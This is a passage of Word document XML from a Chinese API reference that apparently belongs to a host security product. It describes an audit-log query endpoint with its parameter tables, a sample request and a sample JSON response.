          <w:p w14:paraId="12C415BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0782ECAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="338AED96" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="522B78E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>failedRuleIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68C99373" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="182A8DB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建失败的规则列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73C959FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="377" w:name="_Toc115166261"/>
      <w:bookmarkStart w:id="378" w:name="系统审计日志查询"/>
      <w:bookmarkEnd w:id="346"/>
      <w:bookmarkEnd w:id="376"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>系统审计日志查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
    </w:p>
    <w:p w14:paraId="0E8E88EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询系统的审计日志信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D276DD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CACF1F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/system/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>audit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="51CAB6E4"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313"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2578"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C461C8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8D72AD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21931DB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23E71A38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73E5A70A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70EED9FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38C11E1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eventName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63AD2BC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05756B0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0498B1EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作名称（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7072F695" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="162DB9A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7337B6CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6C915E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F11944C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作的</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="056A9D35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D9D18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/system/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>audit?size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19208D52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA2FF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eventId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5bf4db32c0591c4ab22b6307",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eventType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "新建",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eventName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Linux-资产清点-主机发现",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eventSource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Console",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>resourceFunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "资产清点",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>resourceSubFunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "主机资产",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requestIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "location": "本机地址",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requestId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "362a33c0fc5a4d858ed22e1800ade08d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requestParam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "{\n  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": \"59080851823593e1a80b\",\n  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": \"59080851823593e1a80b\",\n    \"page\": 1,\n    \"size\": 50,\n    \"orders\": [\n        {\n            \"field\": \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",\n            \"ascend\": true\n        }\n    ],\n    \"filters\": [\n        \"platform\",\n        \"group\"\n    ],\n    \"charts\": [\n        \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",\n        \"platform\",\n        \"group\"\n    ]\n}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "dev@xx.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>responseCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eventTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1542773554</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 13,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F2B3E"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2223"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5418"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1BC167C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CDA9D73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D719E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C094D38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE42DE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="535088AF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B74955" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eventId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43852E60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6750F350" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2793271F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>事件id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5177F6CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="539872CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eventType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A78D20E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281F23AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DA86D5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>事件类型，包括新建、修改、删除、查看、认证、文件、执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="679CC90B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0243FFE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eventName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05BCE3D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A7D54F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7530AE54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E9B7BAB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D9A702" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>eventSource</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE89C71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72C67509" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4284E03E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>事件来源，包括Console、外部</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>、系统内部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="15021A5D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE44476" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="292327BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B7E1A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D58069A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统 1-linux 2-windows 0-通用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68BE52DD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBA2227" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>resourceFunction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBCE6C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78EDDAAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57EAE0C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>所属主功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4068E029" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="687DCBF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>resourceSubFunction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D05A65B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
